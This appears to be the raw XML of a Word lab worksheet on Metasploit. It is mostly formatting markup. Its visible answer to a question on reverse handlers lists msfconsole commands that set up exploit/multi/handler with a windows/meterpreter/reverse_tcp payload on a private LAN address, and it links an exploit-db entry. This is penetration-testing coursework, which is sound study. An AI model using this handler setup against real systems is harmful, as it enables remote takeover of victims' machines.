    <w:p w14:paraId="5B39E95A" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="23"/>
        <w:ind w:left="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D05F665" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="2016D1EB" w14:textId="0C9EF515" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00FC2E29">
      <w:r>
        <w:t>3. What modules would you use to set up a reverse handler?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77623BD1" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E9DBE6F" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="79" w:right="3502"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-131"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.1.31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F6564" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04079F78" w14:textId="7A52A4C0" w:rsidR="00E60626" w:rsidRPr="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B462B" w14:textId="77777777" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29"/>
    <w:p w14:paraId="764EA46A" w14:textId="0C1B2D67" w:rsidR="00E60626" w:rsidRDefault="00E60626">
      <w:r>
        <w:t>-------------------------------------------End of Lab------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E606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23394F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A6CE7B6"/>
    <w:lvl w:ilvl="0" w:tplc="DE3C5C1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="452" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-1"/>
        <w:w w:val="97"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="single" w:color="000000"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7702E720">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="447" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="120"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5C12712A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1486" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E1AE8352">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2513" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="71D8FB04">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3540" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="634CCE2C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4566" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F266D814">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5593" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="162018AA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6620" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="88EA0E68">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7646" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="17903208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2E29"/>
    <w:rsid w:val="000B202E"/>
    <w:rsid w:val="00174691"/>
    <w:rsid w:val="004B559C"/>
    <w:rsid w:val="00881B75"/>
    <w:rsid w:val="00A4497A"/>
    <w:rsid w:val="00CD5AC6"/>
    <w:rsid w:val="00D749E5"/>
    <w:rsid w:val="00E60626"/>
    <w:rsid w:val="00EB4569"/>
    <w:rsid w:val="00ED2BEA"/>
    <w:rsid w:val="00F23115"/>
    <w:rsid w:val="00FC2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233725"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D79E11D2-075E-44A4-860C-75A4222F0A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gu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2E29"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FC2E2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2E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2E2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2E2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2E2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2E2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2E2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2E2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2E2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2E2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C2E2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2E2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2E2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2E2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2E2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2E2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2E2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2E2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C2E2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2E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2E2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C2E2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C2E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C2E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C2E2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C2E2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2E2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2E2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C2E2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4497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4497A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1"/>
    <w:qFormat/>
    <w:rsid w:val="00D749E5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kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:bidi="ar-SA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D749E5"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:bidi="ar-S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exploit-db.com/exploits/636" TargetMode="External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8</Pages>
  <Words>553</Words>
  <Characters>3153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Krutarth Panchal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Krutarth Panchal</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-20T06:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-20T07:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>